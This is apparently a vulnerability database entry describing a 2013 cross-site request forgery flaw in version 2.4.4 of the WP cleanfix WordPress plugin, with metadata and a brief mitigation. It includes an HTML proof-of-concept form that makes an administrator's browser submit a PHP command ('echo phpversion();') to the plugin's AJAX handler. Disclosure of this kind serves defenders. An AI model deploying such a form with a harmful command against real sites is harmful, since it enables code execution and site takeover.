vendor:
WP cleanfix
by:
SecurityFocus
3,1
CVSS
MEDIUM
Cross-Site Request Forgery
352
CWE
Product Name: WP cleanfix
Affected Version From: 2.4.4
Affected Version To: 2.4.4
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wp_cleanfix
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013
WP cleanfix Cross-Site Request Forgery Vulnerability
The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible. SRF PoC - generated by Burp Suite Professional --> <body> <form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpCleanFixAjax" /> <input type="hidden" name="command" value="echo phpversion();" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Mitigation:
Users should only use trusted sources for plugins and themes, and should always verify the authenticity of the code before installing it. Additionally, users should keep all installed plugins and themes up to date.
